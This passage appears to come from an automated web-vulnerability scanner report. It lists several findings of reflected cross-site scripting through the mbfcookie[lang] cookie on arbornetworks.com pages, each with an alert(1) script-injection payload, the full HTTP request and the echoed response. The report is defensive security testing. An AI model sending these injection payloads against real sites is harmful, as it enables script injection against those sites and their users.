Date: Wed, 02 Feb 2011 23:53:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9af230516344f96bbe970bf33d278e37; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:56 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:56 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:57 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:53:58 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en4c1e4\"><script>alert(1)</script>7b05d39a8bb">
...[SNIP]...

3.154. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-places-in-your-network.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5446"><script>alert(1)</script>29761611793 was submitted in the mbfcookie[lang] cookie. This input was echoed as f5446\"><script>alert(1)</script>29761611793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solutions-for-places-in-your-network.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf5446"><script>alert(1)</script>29761611793; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:19 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=8780a402deff999d6ab9f141654291b0; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:21 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:21 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:22 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:22 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="enf5446\"><script>alert(1)</script>29761611793">
...[SNIP]...

3.155. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-your-business-needs.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64ac0"><script>alert(1)</script>6ebae96397e was submitted in the mbfcookie[lang] cookie. This input was echoed as 64ac0\"><script>alert(1)</script>6ebae96397e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/solutions-for-your-business-needs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en64ac0"><script>alert(1)</script>6ebae96397e; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=604541f1f9e41149b2fb1c9dd4446d9a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:19 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en64ac0\"><script>alert(1)</script>6ebae96397e">
...[SNIP]...

3.156. http://www.arbornetworks.com/en/technology-partners-4.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/technology-partners-4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53001"><script>alert(1)</script>055958a227a was submitted in the mbfcookie[lang] cookie. This input was echoed as 53001\"><script>alert(1)</script>055958a227a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/technology-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en53001"><script>alert(1)</script>055958a227a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c300a37ef4119988756fe3892abfa309; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:19 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:19 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:20 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="en53001\"><script>alert(1)</script>055958a227a">
...[SNIP]...

3.157. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/what-we-do-network-security-solutions-services.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 710ca"><script>alert(1)</script>808460338d8 was submitted in the mbfcookie[lang] cookie. This input was echoed as 710ca\"><script>alert(1)</script>808460338d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en710ca"><script>alert(1)</script>808460338d8; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=b8b1c40b2e2b789de45e534d4f492b77; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:06 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...
<meta lang="en710ca\"><script>alert(1)</script>808460338d8">
...[SNIP]...

3.158. http://www.arbornetworks.com/en/white-papers-global-network-security-topics-2.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/white-papers-global-network-security-topics-2.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f28af"><script>alert(1)</script>be53bf7bfc was submitted in the mbfcookie[lang] cookie. This input was echoed as f28af\"><script>alert(1)</script>be53bf7bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /en/white-papers-global-network-security-topics-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=enf28af"><script>alert(1)</script>be53bf7bfc; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:53:53 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=31b8094758816ee9cc2d818e8530d4be; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:53:53 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:53:53 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:53:54 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:53:58 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...
<meta lang="enf28af\"><script>alert(1)</script>be53bf7bfc">
...[SNIP]...

3.159. http://www.arbornetworks.com/es/5.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/5.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7374"><script>alert(1)</script>b64724bdb0 was submitted in the mbfcookie[lang] cookie. This input was echoed as e7374\"><script>alert(1)</script>b64724bdb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /es/5.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene7374"><script>alert(1)</script>b64724bdb0; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=fb818fa49d537cc5fce3a94363e01092; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:44 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:44 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Thu, 03-Feb-2011 23:57:45 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:45 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="ene7374\"><script>alert(1)</script>b64724bdb0">
...[SNIP]...

3.160. http://www.arbornetworks.com/es/infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /es/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e33d8"><script>alert(1)</script>9427a0c6b34 was submitted in the mbfcookie[lang] cookie. This input was echoed as e33d8\"><script>alert(1)</script>9427a0c6b34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /es/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=ene33d8"><script>alert(1)</script>9427a0c6b34; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:04:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9c3ed27b413e57a1b3a097d69fb69da0; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:04:47 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:04:47 GMT; path=/
Set-Cookie: mbfcookie[lang]=es; expires=Fri, 04-Feb-2011 00:04:48 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:04:50 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="ene33d8\"><script>alert(1)</script>9427a0c6b34">
...[SNIP]...

3.161. http://www.arbornetworks.com/fr/4.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/4.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7922b"><script>alert(1)</script>692436b615a was submitted in the mbfcookie[lang] cookie. This input was echoed as 7922b\"><script>alert(1)</script>692436b615a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fr/4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en7922b"><script>alert(1)</script>692436b615a; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:57:49 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e816be6b7e10a7833fede5081bc89561; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:57:50 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:57:50 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Thu, 03-Feb-2011 23:57:51 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:57:52 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en7922b\"><script>alert(1)</script>692436b615a">
...[SNIP]...

3.162. http://www.arbornetworks.com/fr/infrastructure-security-report.html [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /fr/infrastructure-security-report.html

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48fef"><script>alert(1)</script>d8a50681f6d was submitted in the mbfcookie[lang] cookie. This input was echoed as 48fef\"><script>alert(1)</script>d8a50681f6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fr/infrastructure-security-report.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en48fef"><script>alert(1)</script>d8a50681f6d; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:05:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=27d583331c6a7879eddd591a037c3b05; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 00:05:05 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 00:05:05 GMT; path=/
Set-Cookie: mbfcookie[lang]=fr; expires=Fri, 04-Feb-2011 00:05:06 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 03 Feb 2011 00:05:15 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...
<meta lang="en48fef\"><script>alert(1)</script>d8a50681f6d">
...[SNIP]...

3.163. http://www.arbornetworks.com/index.php [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /index.php

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c78"><script>alert(1)</script>04e4fe7d485 was submitted in the mbfcookie[lang] cookie. This input was echoed as 51c78\"><script>alert(1)</script>04e4fe7d485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /index.php HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en51c78"><script>alert(1)</script>04e4fe7d485; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:49:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=c5fd5a1d7428bc9ca259b0b09b906436; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:49:06 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:49:06 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:49:07 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:49:08 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en51c78\"><script>alert(1)</script>04e4fe7d485">
...[SNIP]...

3.164. http://www.arbornetworks.com/it [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /it

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd6b5"><script>alert(1)</script>22edd466f97 was submitted in the mbfcookie[lang] cookie. This input was echoed as bd6b5\"><script>alert(1)</script>22edd466f97 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /it HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
